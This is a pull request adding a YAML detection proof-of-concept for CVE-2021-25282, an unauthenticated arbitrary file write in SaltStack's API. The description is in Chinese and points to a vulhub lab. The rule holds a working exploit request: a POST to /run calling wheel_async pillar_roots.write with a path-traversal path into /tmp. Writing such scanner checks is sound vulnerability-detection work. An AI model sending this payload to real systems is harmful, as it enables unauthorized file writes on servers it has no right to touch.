### PR TITLE
cve-2021-25282 saltstack任意写

### DIFF
--- a/pocs/saltstack-cve-2021-25282-file-write.yml
+++ b/pocs/saltstack-cve-2021-25282-file-write.yml
@@ -1,0 +1,22 @@
+name: poc-yaml-saltstack-cve-2021-25282-file-write
+set:
+  r1: randomLowercase(5)
+rules:
+  - method: GET
+    path: /run
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"wheel_async") && response.body.bcontains(b"runner_async")
+  - method: POST
+    path: /run
+    headers:
+      Content-type: application/json
+    body: >-
+      {"eauth":"auto","client":"wheel_async","fun":"pillar_roots.write","data":"{{r1}}","path":"../../../../../../../../../tmp/{{r1}}"}
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.content_type.icontains("application/json") && "salt/wheel/d*".bmatches(response.body)
+detail:
+  author: jweny(https://github.com/jweny)
+  links:
+    - https://www.anquanke.com/post/id/232748


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的

CVE-2021-25282 Saltstack 可在未授权的情况下写入任意数据。

https://www.anquanke.com/post/id/232748

## 测试环境

可以借用vulhub  https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-16846/README.zh-cn.md
![image](https://user-images.githubusercontent.com/26767398/110090135-e6dfde00-7dd1-11eb-929a-ceeda9d79fc1.png)

![image](https://user-images.githubusercontent.com/26767398/110090175-f3643680-7dd1-11eb-8d64-ee9ee9db5134.png)

![image](https://user-images.githubusercontent.com/26767398/110090015-c4e65b80-7dd1-11eb-939e-0ec6aef5588d.png)


## 备注

